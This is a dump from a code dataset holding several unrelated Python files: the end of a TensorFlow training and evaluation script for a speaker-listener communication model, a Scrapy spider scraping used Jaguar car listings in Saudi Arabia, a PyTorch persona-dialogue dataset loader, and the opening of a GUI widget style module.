make_from_components(\n args.batch_size,\n configs,\n components_dict,\n asym=actually_asym,\n asym_args=asym_args)\n # To satisfy later args\n metadata = {\n 'asym': True,\n 'asym_args': asym_args,\n }\n # Generate a dev set\n dev, dev_metadata = zip(*make_from_components(\n args.n_dev,\n configs,\n components_dict,\n asym=actually_asym,\n asym_args=asym_args))\n dev_envs = None # Flag to generate dev envs only once\n else:\n print(\"Loading data\")\n train, 
metadata = swdata.load_scenes(args.data, gz=True)\n\n asym = False\n if 'asym' in metadata and metadata['asym']:\n print(\"Asymmetric dataset detected\")\n asym = True\n\n # Train/test split\n if args.test:\n # Keep unique configs only\n if not args.test_no_unique:\n # TODO: Support different kinds of testing (e.g. left/right)\n unique_sets = []\n seen_configs = set()\n for config_data, config_md in zip(train, metadata['configs']):\n config_hashable = (tuple(config_md['distractor']),\n tuple(config_md['target']),\n config_md['relation'],\n config_md['relation_dir'])\n if config_hashable not in seen_configs:\n seen_configs.add(config_hashable)\n unique_sets.append((config_data, config_md))\n random.shuffle(unique_sets)\n train, test = swdata.train_test_split(\n unique_sets, test_split=args.test_split)\n train = swdata.flatten(train, with_metadata=True)\n test = swdata.flatten(test, with_metadata=True)\n random.shuffle(train)\n random.shuffle(test)\n else:\n train = list(zip(train, metadata['configs']))\n train, test = swdata.train_test_split(\n train, test_split=args.test_split)\n train = swdata.flatten(train, with_metadata=True)\n test = swdata.flatten(test, with_metadata=True)\n random.shuffle(train)\n random.shuffle(test)\n print(\"Train:\", len(train), \"Test:\", len(test))\n else:\n # Just train on everything.\n train = list(zip(train, metadata['configs']))\n train = swdata.flatten(train, with_metadata=True)\n random.shuffle(train)\n\n if asym:\n max_images = metadata['asym_args']['max_images']\n n_attrs = len(train[0].world.speaker_worlds[0].shapes[0])\n else:\n max_images = metadata['n_targets'] + metadata['n_distractors']\n n_attrs = len(train[0].world.worlds[0].shapes[0])\n\n # Hardcoded for now\n max_shapes = 2\n\n print(\"Building model\")\n if args.model == 'feature':\n if asym:\n tfs, tls, tfl, tll, t_msg, t_pred, t_loss = build_feature_model(\n max_images,\n max_shapes,\n n_attrs,\n net_arch=(args.n_hidden, args.n_comm),\n discrete=args.comm_type == 'discrete',\n asym=True)\n else:\n t_features, t_labels, t_msg, t_pred, t_loss = build_feature_model(\n max_images,\n max_shapes,\n n_attrs,\n net_arch=(args.n_hidden, args.n_comm),\n discrete=args.comm_type == 'discrete',\n asym=False)\n elif args.model == 'end2end':\n if asym:\n tfs, tls, tfl, tll, t_msg, t_pred, t_loss, convs, convl = build_end2end_model(\n max_images,\n net_arch=(args.n_hidden, args.n_comm, args.n_conv),\n discrete=args.comm_type == 'discrete',\n rnncell=RNN_CELLS[args.rnn_cell],\n asym=True)\n else:\n t_features, t_labels, t_msg, t_pred, t_loss, convs, convl = build_end2end_model(\n max_images,\n net_arch=(args.n_hidden, args.n_comm, args.n_conv),\n discrete=args.comm_type == 'discrete',\n rnncell=RNN_CELLS[args.rnn_cell],\n asym=False)\n else:\n raise RuntimeError(\"Unknown model type {}\".format(args.model))\n optimizer = tf.train.AdamOptimizer(0.001)\n o_train = optimizer.minimize(t_loss)\n config = tf.ConfigProto()\n config.gpu_options.allow_growth = True\n session = tf.Session(config=config)\n if args.debug:\n session = tf_debug.LocalCLIDebugWrapperSession(\n session, dump_root='/local/scratch/jlm95/tfdbg/')\n session.run(tf.global_variables_initializer())\n\n if args.tensorboard:\n print(\"Saving logs to {}\".format(args.tensorboard_save))\n tf.summary.FileWriter(\n args.tensorboard_save, graph=tf.get_default_graph())\n print(\"Exiting\")\n sys.exit(0)\n\n # ==== TRAIN ====\n if args.restore:\n saver = tf.train.Saver()\n saver.restore(session, args.restore_path.format(**vars(args)))\n else:\n acc_history 
= []\n loss_history = []\n\n print(\"Training\")\n for epoch in range(args.epochs):\n if args.components:\n if epoch != 0:\n # Sample new components\n train = make_from_components(\n args.batch_size,\n configs,\n components_dict,\n asym=actually_asym,\n asym_args=asym_args)\n else:\n # Shuffle training data, since epoch is complete\n random.shuffle(train)\n loss = 0\n hits = 0\n total = 0\n if args.components:\n batch_iter = [train]\n else:\n batch_iter = batches(\n train, args.batch_size, max_data=args.max_data)\n for batch in batch_iter:\n batch, batch_metadata = zip(*batch)\n if args.model == 'feature':\n if asym:\n # Since we need to measure accuracy stats on listener\n # labels, keep name for those\n se, sl, envs, labels = swdata.extract_envs_and_labels(\n batch, max_images, max_shapes, n_attrs, asym=True)\n else:\n envs, labels = swdata.extract_envs_and_labels(\n batch, max_images, max_shapes, n_attrs, asym=False)\n elif args.model == 'end2end':\n if asym:\n se, sl, envs, labels = swdata.prepare_end2end(\n batch, max_images, asym=True)\n else:\n envs, labels = swdata.prepare_end2end(\n batch, max_images, asym=False)\n else:\n raise RuntimeError\n if asym:\n l, preds, _ = session.run([t_loss, t_pred, o_train], {\n tfs: se,\n tls: sl,\n tfl: envs,\n tll: labels\n })\n else:\n l, preds, _ = session.run([t_loss, t_pred, o_train], {\n t_features: envs,\n t_labels: labels\n })\n\n match = (preds > 0) == labels\n loss += l\n hits += np.all(match, axis=1).sum()\n total += len(match)\n\n if args.components and (epoch % args.dev_every == 0):\n # Every 10 epochs, print dev accuracy\n if dev_envs is None:\n if args.model == 'feature':\n if asym:\n # Since we need to measure accuracy stats on listener\n # labels, keep name for those\n dev_se, dev_sl, dev_envs, dev_labels = swdata.extract_envs_and_labels(\n dev, max_images, max_shapes, n_attrs, asym=True)\n else:\n dev_envs, dev_labels = swdata.extract_envs_and_labels(\n dev, max_images, max_shapes, n_attrs, asym=False)\n elif args.model == 'end2end':\n if asym:\n dev_se, dev_sl, dev_envs, dev_labels = swdata.prepare_end2end(\n dev, max_images, asym=True)\n else:\n dev_envs, dev_labels = swdata.prepare_end2end(\n dev, max_images, asym=False)\n else:\n raise RuntimeError\n if asym:\n dev_l, dev_preds, dev_msgs, dev_convs, dev_convl = session.run(\n [t_loss, t_pred, t_msg, convs, convl], {\n tfs: dev_se,\n tls: dev_sl,\n tfl: dev_envs,\n tll: dev_labels\n })\n else:\n dev_l, dev_preds, dev_msgs, dev_convs, dev_convl = session.run(\n [t_loss, t_pred, t_msg, convs, convl], {\n t_features: dev_envs,\n t_labels: dev_labels\n })\n\n dev_match = (dev_preds > 0) == dev_labels\n assert len(dev_match) == args.n_dev\n dev_hits = np.all(dev_match, axis=1).sum()\n dev_acc = dev_hits / args.n_dev\n print(\"Epoch {}: Dev accuracy {}, Loss {}\".format(\n epoch, dev_acc, dev_l))\n elif not args.components:\n acc = hits / total\n print(\"Epoch {}: Accuracy {}, Loss {}\".format(\n epoch, acc, loss))\n\n loss_history.append(loss)\n acc_history.append(acc)\n\n if args.save:\n saver = tf.train.Saver()\n saver.save(session, args.save_path.format(**vars(args)))\n\n # ==== TEST ====\n if args.components:\n if not args.test:\n print(\"Warning: --components but not --test, using dev\")\n test_or_train = list(zip(dev, dev_metadata))\n else:\n print(\"Loading testing components\")\n # Make sure memory is free\n del configs, components_dict\n gc.collect()\n configs, components_dict = load_components(args.test_components)\n # TEMP: test one config\n # configs = configs[0]\n # 
configs = add_weights(configs)\n test_or_train = make_from_components(\n args.n_test,\n configs,\n components_dict,\n asym=actually_asym,\n asym_args=asym_args)\n else:\n test_or_train = test if args.test else train\n\n # Eval test in batches too\n print(\"Eval test\")\n all_records = []\n\n if args.components and args.test:\n # Add dev messages\n dev_true_examples = list(map(find_true_example, zip(dev_se, dev_sl)))\n dev_convs_true = list(map(find_true_example, zip(dev_convs, dev_sl)))\n dev_convl_true = list(map(find_true_example, zip(dev_convl, dev_labels)))\n\n dev_records = zip(\n dev_msgs,\n dev_convs_true,\n dev_convl_true,\n dev_preds,\n dev_labels,\n (x.relation[0] for x in dev),\n (x.relation_dir for x in dev),\n (c['target'][0] for c in dev_metadata),\n (c['target'][1] for c in dev_metadata),\n (c['distractor'][0] for c in dev_metadata),\n (c['distractor'][1] for c in dev_metadata),\n dev_true_examples,\n itertools.cycle(['dev']))\n all_records.extend(dev_records)\n\n for batch in batches(test_or_train, args.batch_size):\n batch, batch_metadata = zip(*batch)\n if args.model == 'feature':\n if asym:\n bse, bsl, batch_envs, batch_labels = \\\n swdata.extract_envs_and_labels(\n batch, max_images, max_shapes, n_attrs, asym=True)\n else:\n batch_envs, batch_labels = swdata.extract_envs_and_labels(\n batch, max_images, max_shapes, n_attrs, asym=False)\n elif args.model == 'end2end':\n if asym:\n bse, bsl, batch_envs, batch_labels = \\\n swdata.prepare_end2end(batch, max_images, asym=True)\n else:\n batch_envs, batch_labels = swdata.prepare_end2end(\n batch, max_images, asym=False)\n else:\n raise RuntimeError(\"Unknown model {}\".format(args.model))\n\n if asym:\n batch_msgs, batch_preds, batch_convs, batch_convl = session.run(\n [t_msg, t_pred, convs, convl], {\n tfs: bse,\n tls: bsl,\n tfl: batch_envs,\n tll: batch_labels\n })\n else:\n batch_msgs, batch_preds, batch_convs, batch_convl = session.run(\n [t_msg, t_pred, convs, convl], {\n t_features: batch_envs,\n t_labels: batch_labels\n })\n\n bse_true_examples = list(map(find_true_example, zip(bse, bsl)))\n bse_convs_true = list(map(find_true_example, zip(batch_convs, bsl)))\n bse_convl_true = list(map(find_true_example, zip(batch_convl, batch_labels)))\n\n batch_records = zip(\n batch_msgs,\n bse_convs_true,\n bse_convl_true,\n batch_preds,\n batch_labels,\n (x.relation[0] for x in batch),\n (x.relation_dir for x in batch),\n (c['target'][0] for c in batch_metadata),\n (c['target'][1] for c in batch_metadata),\n (c['distractor'][0] for c in batch_metadata),\n (c['distractor'][1] for c in batch_metadata),\n # BSE\n bse_true_examples,\n itertools.cycle(['test']))\n all_records.extend(batch_records)\n\n all_df = pd.DataFrame.from_records(\n all_records,\n columns=('msg', 'convs', 'convl',\n 'pred', 'obs', 'relation', 'relation_dir',\n 'target_shape', 'target_color', 'distractor_shape',\n 'distractor_color', 'example_image', 'phase'))\n all_df.pred = all_df.pred.apply(lambda x: x > 0)\n all_df.obs = all_df.obs.apply(lambda x: x.astype(np.bool))\n all_df['correct'] = pd.Series(\n map(lambda t: np.all(t[0] == t[1]), zip(all_df.pred, all_df.obs)),\n dtype=np.bool)\n all_df.relation = all_df.relation.astype('category')\n all_df.relation_dir = all_df.relation_dir > 0\n for cat_col in [\n 'target_shape', 'target_color', 'distractor_shape',\n 'distractor_color'\n ]:\n all_df[cat_col] = all_df[cat_col].astype('category')\n\n if args.test: # Print test accuracy\n print(\"Test accuracy: {}\".format(all_df.correct.mean()))\n\n if args.save_max 
is not None:\n all_df = all_df.iloc[:args.save_max]\n\n if not args.no_save_msgs:\n print(\"Saving {} model predictions\".format(all_df.shape[0]))\n all_df.drop(\n ['convs', 'convl'], axis=1\n ).to_pickle((args.msgs_file.format(**vars(args))))\n\n if args.tensorboard_messages:\n # Number of messages limited by sprite size\n ind_size = 64\n sprite_size = 8192\n os.makedirs(args.tensorboard_save, exist_ok=True)\n if all_df.shape[0] > ((sprite_size / ind_size)**2):\n print(\n \"Warning: too many images, will truncate. Increase sprite size!\"\n )\n all_df = all_df.iloc[:(sprite_size / ind_size)**2]\n\n from tensorflow.contrib.tensorboard.plugins import projector\n messages = tf.Variable(\n tf.convert_to_tensor(\n np.vstack(all_df.msg),\n name='messages_embed_raw',\n preferred_dtype=np.float32),\n name='messages_embed')\n convs_embedding = tf.Variable(\n tf.convert_to_tensor(\n np.vstack(all_df.convs),\n name='convs_embed_raw',\n preferred_dtype=np.float32),\n name='convs_embed')\n convl_embedding = tf.Variable(\n tf.convert_to_tensor(\n np.vstack(all_df.convl),\n name='convl_embed_raw',\n preferred_dtype=np.float32),\n name='convl_embed')\n\n # Save and initialize messages to model checkpoint\n embeddings_to_save = [messages, convs_embedding, convl_embedding]\n for emts in embeddings_to_save:\n session.run(emts.initializer)\n saver = tf.train.Saver(embeddings_to_save)\n saver.save(session, os.path.join(args.tensorboard_save, \"model.ckpt\"))\n config = projector.ProjectorConfig()\n\n # Save metadata\n md_path = os.path.join(args.tensorboard_save, 'metadata.tsv')\n md_df = all_df[[\n 'correct', 'target_color', 'target_shape', 'distractor_color',\n 'distractor_shape', 'relation', 'relation_dir', 'phase'\n ]]\n\n # Make target/distractor strings too\n md_df['target'] = pd.Series(\n ['{}-{}'.format(x, y)\n for x, y in zip(md_df.target_shape, md_df.target_color)])\n md_df['distractor'] = pd.Series(\n ['{}-{}'.format(x, y)\n for x, y in zip(md_df.distractor_shape,\n md_df.distractor_color)])\n md_df['config'] = pd.Series(\n ['{}-{}'.format(x, y)\n for x, y in zip(md_df.target,\n md_df.distractor)])\n md_df['same_color'] = md_df.target_color == md_df.distractor_color\n md_df.to_csv(md_path, sep='\\t', index=False)\n\n # Sprites\n sprite_path = os.path.join(args.tensorboard_save, 'sprite.png')\n # Assume 64px sprites\n sprite_arr = np.zeros((sprite_size, sprite_size, 3), dtype=np.float32)\n ex_img_i = 0\n try:\n for si in range(0, sprite_size, ind_size):\n for sj in range(0, sprite_size, ind_size):\n ex_img = all_df.example_image[ex_img_i]\n sprite_arr[si:si + ind_size, sj:sj + ind_size] = ex_img\n ex_img_i += 1\n except KeyError:\n assert ex_img_i == len(all_df.example_image)\n sprite_arr = (sprite_arr * 255).astype(np.uint8)\n imsave(sprite_path, sprite_arr)\n\n # Messages embedding\n for embedding_config in embeddings_to_save:\n this_em = config.embeddings.add()\n this_em.tensor_name = embedding_config.name\n this_em.sprite.image_path = 'sprite.png'\n this_em.sprite.single_image_dim.extend([ind_size, ind_size])\n this_em.metadata_path = 'metadata.tsv'\n\n summary_writer = tf.summary.FileWriter(args.tensorboard_save)\n projector.visualize_embeddings(summary_writer, config)\n","sub_path":"rnn_syn.py","file_name":"rnn_syn.py","file_ext":"py","file_size_in_byte":39605,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"478244606","text":"\nimport scrapy\nfrom scrapy_splash import SplashRequest\nfrom scrapy.http import Request,FormRequest\nimport 
re\nimport uuid\nimport hashlib\nimport logging\nimport subprocess\nimport requests\nimport csv\nimport io\nfrom scrapy.spiders import Spider\nfrom datetime import datetime\nfrom scrapy.http import Request,FormRequest\nimport json\nfrom scrapy.http.headers import Headers\nimport urllib\nfrom collections import OrderedDict\n#from jaguar.items import JaguarItem\nfrom autodata.items import AutodataItem, MetaItem\n\nclass MySpider(Spider):\n name = 'jaguar_sa'\n start_urls = ['http://approved.me.jaguar.com/en_qa/used/saudi-arabia?_ga=2.158721594.1266032569.1556196277-1748026362.1556196277']\n urls= ['http://approved.me.jaguar.com/en_qa/used/saudi-arabia?_ga=2.158721594.1266032569.1556196277-1748026362.1556196277']\n## start_urls = ['http://approved.me.jaguar.com/en_qa/saudi-arabia/used/2018/jaguar/xj/Mohamed_Yousuf_Naghi_Motors_-_Al_Khobar_/_Dammam-110413']\n## urls= ['http://approved.me.jaguar.com/en_qa/saudi-arabia/used/2018/jaguar/xj/Mohamed_Yousuf_Naghi_Motors_-_Al_Khobar_/_Dammam-110413']\n \n \n def start_requests(self):\n for url in self.urls:\n yield SplashRequest(url,callback=self.parse,endpoint='render.html',args={'wait':'5'})\n\n \n\n def parse(self, response):\n print(\"##################\")\n body = response.body\n links = response.xpath(\"//div[contains(@class,'results__vehicle column--nopadding small-12 medium-4 large-3 ')]/a[1]/@href\").extract()\n links = list(OrderedDict.fromkeys(links))\n #print(len(links))\n for link in links:\n web= \"http://approved.me.jaguar.com\"+link\n #yield SplashRequest(web,callback=self.getdata,endpoint='render.html', args={'wait':'15'},headers={'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36'})\n yield Request(web, callback=self.getdata, dont_filter = True)\n #yield SplashRequest(web,callback=self.getdata,endpoint='render.html', args={'wait':'15'}, headers = {'User-Agent':'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36'})\n\n def getdata(self,response):\n print(\"******************\")\n item=AutodataItem()\n item2 = MetaItem()\n item[\"Last_Code_Update_Date\"] = \"\"\n item[\"Scrapping_Date\"] = \"\"\n item[\"Country\"] = \"KSA\"\n item[\"City\"] = \"\"\n item[\"Seller_Type\"] = \"Official Dealers\"\n item[\"Seller_Name\"] = \"Universal Motor Agencies\"\n item[\"Car_URL\"] = \"\"\n item[\"Car_Name\"] = \"\"\n item[\"Year\"] = \"\"\n item[\"Make\"] = \"\"\n item[\"model\"] = \"\"\n item[\"Spec\"] = \"\"\n item[\"Doors\"] = \"\"\n item[\"transmission\"] = \"\"\n item[\"trim\"] = \"\"\n item[\"bodystyle\"] = \"\"\n item[\"other_specs_gearbox\"] = \"\"\n item[\"other_specs_seats\"] = \"\"\n item[\"other_specs_engine_size\"] = \"\"\n item[\"other_specs_horse_power\"] = \"\"\n item[\"colour_exterior\"] = \"\"\n item[\"colour_interior\"] = \"\"\n item[\"fuel_type\"] = \"\"\n item[\"import_yes_no_also_referred_to_as_GCC_spec\"] = \"\" \n item[\"mileage\"] = \"\"\n item[\"condition\"] = \"\"\n item[\"warranty_untill_when\"] = \"\"\n item['service_contract_untill_when'] = ''\n item['Price_Currency'] = ''\n item['asking_price_inc_VAT'] = ''\n item['asking_price_ex_VAT'] = ''\n item['warranty'] = 'yes'\n item['service_contract'] = ''\n item['vat'] = 'yes'\n item['mileage_unit'] = ''\n item['engine_unit'] = ''\n item['Last_Code_Update_Date'] = 'Thursday, June 07, 2019'\n item['Scrapping_Date'] = datetime.today().strftime('%A, %B %d, %Y')\n item['autodata_Make'] = ''\n item['autodata_Make_id'] = ''\n 
item['autodata_model'] = ''\n item['autodata_model_id'] = ''\n item['autodata_Spec'] = ''\n item['autodata_Spec_id'] = ''\n item['autodata_transmission'] = ''\n item['autodata_transmission_id'] = ''\n item['autodata_bodystyle'] = ''\n item['autodata_bodystyle_id'] = ''\n\n item2['src'] = \"approved.me.jaguar.com\"\n item2['ts'] = datetime.utcnow().isoformat()\n item2['name'] = \"jaguar_sa\"\n item2['url'] = response.url\n item2['uid'] = str(uuid.uuid4())\n item2['cs'] = hashlib.md5(json.dumps(dict(item), sort_keys=True).encode('utf-8')).hexdigest()\n item['meta'] = dict(item2)\n item['Car_URL'] = response.url\n item['Source'] = item2['src']\n \n item[\"Country\"] = \"Saudi Arabia\"\n c=0\n d=0\n item[\"Seller_Type\"] = \"Large Independent Dealers\"\n item[\"Seller_Name\"] = \"MOHAMED YOUSUF NAGHI MOTORS\"\n item[\"Car_URL\"] = response.url\n\n name = response.xpath(\"//hgroup/h1[contains(@class,'section-title')]/text()\").get().split()[0]\n arr = response.xpath(\"//tr/td/text()\").extract()\n key = response.xpath(\"//tr/th/text()\").extract()\n for k in range(len(key)):\n if 'Model Year' in key[k]:\n item[\"Year\"] = arr[k]\n elif 'Exterior' in key[k]:\n item[\"colour_exterior\"] = arr[k]\n elif 'Interior' in key[k]:\n item[\"colour_interior\"] = arr[k]\n elif 'Kilometers' in key[k]:\n item['mileage'] = arr[k].split(' ')[0]\n item['mileage_unit'] = arr[k].split(' ')[-1]\n elif 'Transmission' in key[k]:\n item[\"transmission\"] = arr[k].split(' ')[-1]\n elif 'Bodystyle' in key[k]:\n item[\"bodystyle\"] = arr[k].split(' ')[-1]\n #item[\"Doors\"] = arr[k].split(' ')[0]\n d = k\n elif 'Engine' in key[k]:\n item[\"other_specs_engine_size\"] = arr[k].split(' ')[0]\n item['cylinders'] = arr[k].split(' ')[1]\n c=k\n item['engine_unit'] = 'l'\n elif 'Fuel Type' in key[k]:\n item[\"fuel_type\"] = arr[k]\n elif 'Location' in key[k]:\n item[\"City\"] = arr[k]\n \n item[\"Make\"] = \"Jaguar\"\n item[\"Car_Name\"] = item[\"Make\"] + ' ' + ''.join(response.xpath('//hgroup/h1[@class=\"section-title\"]/text()').extract()).replace(arr[c].upper() + ' ','').replace(arr[d].upper(),'').strip()\n item['Price_Currency'] = 'SAR'\n item['asking_price_inc_VAT'] = response.xpath(\"//strong[contains(@class,'price-box')]/text()\").get().split('SAR')[-1].strip()\n yield item \n\n \n\n","sub_path":"spiders/jaguar_sa.py","file_name":"jaguar_sa.py","file_ext":"py","file_size_in_byte":6626,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"320170231","text":"\nimport os\nimport time\nfrom filelock import FileLock\n\nimport torch\nfrom torch.utils.data.dataset import Dataset\nfrom torch.nn.utils.rnn import pad_sequence\n\nPAD = ''\nSOS = ''\nEOS = ''\nUNK = ''\nPRESET_SPECIAL_TOKENS = [PAD, SOS, EOS, UNK]\nEN_TO_ZH = dict(\n location='地址',\n name='姓名',\n weight='体重',\n gender='性别',\n age='年龄',\n constellation='星座',\n hobby='爱好',\n speciality='特长',\n) \n\n\nclass Vocab:\n def __init__(\n self,\n vocab,\n profiles,\n data_path,\n special_tokens=None\n ):\n self.stoi_map = {}\n self.itos_map = {}\n self.profile_stoi_map = {}\n self.profile_itos_map = {}\n self.binary_lable = dict(\n positive=1,\n negative=0,\n )\n\n if special_tokens is None:\n special_tokens = PRESET_SPECIAL_TOKENS\n else:\n special_tokens = PRESET_SPECIAL_TOKENS + special_tokens\n\n for i, (k, v) in enumerate(profiles.items()):\n self.profile_stoi_map[k] = (i, v)\n self.profile_itos_map[i] = (k, v)\n\n if vocab is None:\n self.__init(data_path, special_tokens)\n return\n\n for k, v in vocab.items():\n 
self.stoi_map[k] = (v.index, v.count)\n self.itos_map[v.index] = k\n\n i = len(self.stoi_map)\n for k in special_tokens:\n self.stoi_map[k] = [i, 1000]\n self.itos_map[i] = k\n i += 1\n\n def __init(\n self,\n data_path,\n special_tokens=None\n ):\n examples = get_examples(data_path, 'train')\n\n self.stoi_map = {}\n self.itos_map = {}\n\n i = 0\n for post, resp, _ in examples:\n for k in set(post + resp):\n if k not in self.stoi_map:\n self.stoi_map[k] = [i, 0]\n i += 1\n self.stoi_map[k][1] += 1\n\n i = len(self.stoi_map)\n for k in special_tokens:\n self.stoi_map[k] = [i, 1000]\n i += 1\n\n self.itos_map = {i: k for k, (i, _) in self.stoi_map.items()}\n\n def __len__(self):\n return len(self.stoi_map)\n\n def stoi(self, s):\n return self.stoi_map.get(s, self.stoi_map[UNK])[0]\n\n def itos(self, i):\n return self.itos_map[i]\n\n def exists_profile(self, s):\n return s in EN_TO_ZH and EN_TO_ZH[s] in self.profile_stoi_map \\\n or s in self.profile_stoi_map\n\n def profile_stoi(self, s):\n if s in EN_TO_ZH:\n s = EN_TO_ZH[s]\n return self.profile_stoi_map[s][0]\n\n def profile_itos(self, i):\n return self.profile_itos_map[i]\n\n def binary_stoi(self, s):\n return self.binary_lable[s]\n\n def binary_itos(self, i):\n return [k for k, v in self.binary_lable.items() if i == v][0]\n\n\nclass PersonaDataset(Dataset):\n def __init__(\n self,\n vocab,\n max_seq_length,\n data_path,\n cache_path,\n limit_length=None,\n mode='train',\n overwrite_cache=True,\n ):\n # Load data features from cache or dataset file\n cached_features_file = os.path.join(\n cache_path,\n \"cached_{}_{}\".format(\n mode, str(max_seq_length),\n ),\n )\n \n # Make sure only the first process in distributed training processes the dataset,\n # and the others will use the cache.\n lock_path = cached_features_file + \".lock\"\n with FileLock(lock_path):\n if os.path.exists(cached_features_file) and not overwrite_cache:\n start = time.time()\n self.features = torch.load(cached_features_file)\n print(\n f\"Loading features from cached file {cached_features_file} [took %.3f s]\", time.time() - start\n )\n else:\n print(f\"Creating features from dataset file at {data_path}\")\n\n examples = get_examples(data_path, mode)\n if limit_length is not None:\n examples = examples[:limit_length]\n \n self.features = convert_examples_to_features(\n vocab,\n examples,\n max_length=max_seq_length,\n mode=mode,\n )\n start = time.time()\n # torch.save(self.features, cached_features_file)\n # ^ This seems to take a lot of time so I want to investigate why and how we can improve.\n print(\"Saving features into cached file %s [took %.3f s]\" % (cached_features_file, time.time() - start))\n\n def __len__(self):\n return len(self.features)\n\n def __getitem__(self, i):\n return self.features[i]\n\n\ndef get_examples(path, mode):\n post_file_path = os.path.join(path, mode + '.post')\n resp_file_path = os.path.join(path, mode + '.resp')\n key_file_path = os.path.join(path, mode + '.keys')\n\n with open(post_file_path) as f:\n posts = f.read()\n with open(resp_file_path) as f:\n resps = f.read()\n\n keys = ''\n if os.path.exists(key_file_path):\n with open(key_file_path) as f:\n keys = f.read()\n\n def parse(s):\n if len(s) == 0:\n return []\n # last row is blank\n return list(map(lambda x: x.split(), s.split('\\n')))[:-1]\n\n posts_arr = parse(posts)\n resps_arr = parse(resps)\n if keys == '':\n # placehold for early_stage_train\n keys_arr = [['negative', 'name']] * len(posts_arr)\n else:\n keys_arr = parse(keys)\n\n return list(zip(posts_arr, 
resps_arr, keys_arr))\n\n\ndef convert_examples_to_features(\n vocab,\n examples,\n max_length,\n mode\n):\n ret = []\n for post, resp, key in examples:\n if not vocab.exists_profile(key[1]):\n continue\n ipost = [vocab.stoi(k) for k in post[:max_length]] + [vocab.stoi(EOS)]\n iresp = [vocab.stoi(SOS)] + [vocab.stoi(k) for k in resp[:max_length]] + [vocab.stoi(EOS)]\n ikey = [vocab.binary_stoi(key[0]), vocab.profile_stoi(key[1])]\n ret.append((ipost, iresp, ikey))\n return ret\n\n\ndef convert_profiles_to_features(\n vocab,\n profiles\n):\n return [[vocab.stoi(k), vocab.stoi(v)] \n for k, v in profiles.items()]\n\n\n# https://pytorch.org/tutorials/beginner/text_sentiment_ngrams_tutorial.html?highlight=collate_fn\ndef generate_batch(batch, pad_idx):\n post, resp, key = zip(*batch)\n post_lens = [len(v) for v in post]\n resp_lens = [len(v) for v in resp]\n\n fn = lambda x: list(map(torch.tensor, x)) \n post_pad = pad_sequence(fn(post), padding_value=pad_idx)\n resp_pad = pad_sequence(fn(resp), padding_value=pad_idx)\n key = torch.tensor(key)\n\n return post_pad, resp_pad, post_lens, resp_lens, key\n\n\ndef retokenize(fname):\n import jieba\n res = []\n with open(fname) as f:\n ss = f.read()\n for line in ss.split('\\n'):\n line = line.replace(' ', '')\n line = list(jieba.cut(line))\n line = ' '.join(line)\n res.append(line)\n\n name, ext = os.path.splitext(fname) \n fname_res = name + '_retoken' + ext\n with open(fname_res, 'w') as f:\n ss = '\\n'.join(res)\n f.write(ss)\n\n","sub_path":"AssignPersonality/datasets.py","file_name":"datasets.py","file_ext":"py","file_size_in_byte":7304,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"4522386","text":"# $Id: Style.py,v 1.66.2.10 2007/05/08 14:52:37 marcusva Exp $\n#\n# Copyright (c) 2004-2006, Marcus von Appen\n# All rights reserved.\n# Redistribution and use in source and binary forms, with or without\n# modification, are permitted provided that the following conditions are met:\n#\n# * Redistributions of source code must retain the above copyright notice,\n# this list of conditions and the following disclaimer.\n# * Redistributions in binary form must reproduce the above copyright notice,\n# this list of conditions and the following disclaimer in the documentation\n# and/or other materials provided with the distribution.\n#\n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE\n# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE\n# ARE DISCLAIMED. 
IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE\n# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR\n# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF\n# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS\n# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN\n# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)\n# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE\n# POSSIBILITY OF SUCH DAMAGE.\n\n\"\"\"Style class for widgets.\"\"\"\n\nimport os.path, copy\nfrom collections import UserDict # IterableUserDict\nfrom .Constants import *\nfrom .StyleInformation import StyleInformation\n\n# Import the default theme engine path.\nimport sys\nsys.path.append (DEFAULTDATADIR)\nfrom themes import default # needed below for default.RCFILE and default.DefaultEngine\n\nclass WidgetStyle (UserDict):\n \"\"\"WidgetStyle (dict=None) -> WidgetStyle\n\n A style dictionary that tracks changes of its items.\n\n The WidgetStyle dictionary class allows one to let a bound method be\n executed, whenever a value of the dictionary changed. Additionally,\n the WidgetStyle class supports recursive changes, so that a\n WidgetStyle object within this WidgetStyle can escalate the value\n change and so on.\n\n To set up the value change handler you can bind it using the\n set_value_changed() method of the WidgetStyle class:\n\n style.set_value_changed (callback_method)\n\n This will cause it and all values of it, which are WidgetStyle\n objects to invoke the callback_method on changes.\n\n To get the actually set value change handler, the\n get_value_changed() method can be used:\n\n callback = style.get_value_changed ()\n \"\"\"\n def __init__ (self, dict=None):\n # Notifier slot.\n self._valuechanged = None\n UserDict.__init__ (self, dict)\n\n def __copy__ (self):\n \"\"\"W.__copy__ () -> WidgetStyle\n\n Creates a shallow copy of the WidgetStyle dictionary.\n \"\"\"\n newdict = WidgetStyle ()\n keys = self.keys ()\n for k in keys:\n newdict[k] = self[k]\n newdict.set_value_changed (self._valuechanged)\n return newdict\n \n def __deepcopy__(self, memo={}):\n \"\"\"W.__deepcopy__ (...) 
